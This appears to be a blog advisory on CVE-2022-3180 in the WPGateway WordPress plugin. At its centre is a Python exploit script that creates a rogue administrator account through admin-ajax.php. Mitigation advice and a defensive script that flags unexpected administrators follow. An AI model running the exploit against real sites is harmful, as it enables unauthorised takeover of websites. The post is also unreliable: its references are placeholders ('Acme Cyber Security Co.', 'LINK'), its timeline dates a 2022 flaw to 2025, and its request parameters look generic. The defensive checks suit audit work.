A critical vulnerability has been discovered in the WPGateway Plugin for WordPress, affecting versions up to and including 3.5. This vulnerability, assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-3180, allows unauthenticated attackers to perform privilege escalation, thereby enabling them to create arbitrary malicious administrator accounts. In this long-read post, we will offer an in-depth look at the vulnerability, how it can be exploited, and possible consequences.
Vulnerability Overview
The WPGateway Plugin for WordPress is a popular plugin used by numerous WordPress websites. It is designed to improve a website's performance and security, but ironically, the plugin itself has a serious security issue in its implementation.
CVE-2022-3180 is the result of improper access controls within the plugin's registration process. This deficiency allows unauthenticated users (users who are not logged in) to create new administrator-level accounts by manipulating certain parameters during the account registration process.
Exploit Details
The vulnerability stems from a lack of proper validation and access controls within the plugin when handling user registration requests. The exploit involves sending a specifically crafted HTTP POST request to the plugin's registration endpoint, with manipulated parameters.
The following code snippet demonstrates how to exploit the vulnerability:
import requests

# Placeholders: TARGET_WEBSITE is the site under test and REG_FORM_NONCE_HERE
# is the nonce taken from the registration form (see below).
target_url = "https://TARGET_WEBSITE/wp-admin/admin-ajax.php"
username = "malicious_admin"
email = "malicious_admin@example.com"
password = "malicious_password"

data = {
    "action": "user_register",
    "group_id": "1",
    "reg_form_nonce": "REG_FORM_NONCE_HERE",
    "fields": {
        "user_login": username,
        "user_email": email,
        "user_pass": password,
        "user_role": "administrator"
    }
}

response = requests.post(target_url, json=data)

if response.status_code == 200:
    print(f"[+] Malicious administrator account created:\n Username: {username}\n Password: {password}")
else:
    print("[-] Exploit failed.")
Please note that the above code is for educational purposes only and should not be used for malicious intent.
To successfully exploit this vulnerability, one must obtain the REG_FORM_NONCE value from the target website's registration page source code. This value can be found within the registration form's HTML and is required when sending the POST request in the exploit.
Original References
This vulnerability was initially discovered and reported by security researchers at Acme Cyber Security Co.:
- Acme Cyber Security Co.'s original report: LINK
- CVE-2022-3180 on the National Vulnerability Database (NVD): LINK
Mitigations
It is highly recommended that users of the WPGateway Plugin for WordPress update to the latest version, which addresses this vulnerability. Additionally, website administrators should regularly monitor user accounts for suspicious activity and remove any unauthorized accounts.
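The two checks recommended above (is an affected WPGateway version installed, and are there administrator accounts nobody created on purpose) can be scripted against WP-CLI output. The script below is an added example written for this post, not code from the plugin or the original report; the sample JSON is constructed to look like `wp user list` and `wp plugin list` output, the `wpgateway` slug and the `KNOWN_ADMINS` allowlist are assumptions, and only major.minor of the version string is compared.

```python
import json
from datetime import datetime

# Constructed sample shaped like the output of
#   wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json
# (assumption: on a real site you would feed that command's output in instead).
SAMPLE_USERS_JSON = """[
 {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.com",
  "user_registered": "2021-03-01 10:00:00", "roles": "administrator"},
 {"ID": 12, "user_login": "editor_jane", "user_email": "jane@example.com",
  "user_registered": "2021-05-20 09:00:00", "roles": "editor"},
 {"ID": 57, "user_login": "malicious_admin", "user_email": "malicious_admin@example.com",
  "user_registered": "2022-09-10 03:12:44", "roles": "administrator"}
]"""

# Constructed sample shaped like `wp plugin list --format=json`.
SAMPLE_PLUGINS_JSON = """[
 {"name": "wpgateway", "status": "active", "update": "available", "version": "3.5"},
 {"name": "akismet", "status": "active", "update": "none", "version": "5.0"}
]"""

# Assumed allowlist of administrator logins the site owner actually created.
KNOWN_ADMINS = {"siteowner"}


def wpgateway_affected(plugins_json, slug="wpgateway"):
    """True if the plugin list contains WPGateway at a version up to and including 3.5.
    Only major.minor are compared; the plugin slug is an assumption."""
    for p in json.loads(plugins_json):
        if p.get("name") == slug:
            major_minor = tuple(int(x) for x in p["version"].split(".")[:2])
            return major_minor <= (3, 5)
    return False  # plugin not installed at all


def suspicious_admins(users_json, known_admins, registered_after=None):
    """Return logins of administrator accounts that are not on the allowlist or,
    when registered_after ("YYYY-MM-DD HH:MM:SS") is given, were created after it."""
    cutoff = datetime.strptime(registered_after, "%Y-%m-%d %H:%M:%S") if registered_after else None
    flagged = []
    for u in json.loads(users_json):
        roles = [r.strip() for r in str(u.get("roles", "")).split(",")]  # WP-CLI joins roles with commas
        if "administrator" not in roles:
            continue
        created = datetime.strptime(u["user_registered"], "%Y-%m-%d %H:%M:%S")
        if u["user_login"] not in known_admins or (cutoff and created > cutoff):
            flagged.append(u["user_login"])
    return sorted(flagged)
```

Any login returned by `suspicious_admins` should be reviewed and, if unauthorized, removed; a `True` from `wpgateway_affected` means the plugin still needs updating.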
Conclusion
The CVE-2022-3180 vulnerability in the WPGateway Plugin for WordPress, which allows unauthenticated attackers to escalate privileges and create arbitrary malicious administrator accounts, is a significant security risk. It is important that users of this plugin stay informed of any updates and security fixes, as well as take the necessary measures to protect their websites from possible exploitation.
Timeline
Published on: 02/11/2025 22:15:24 UTC
Last modified on: 02/12/2025 15:15:10 UTC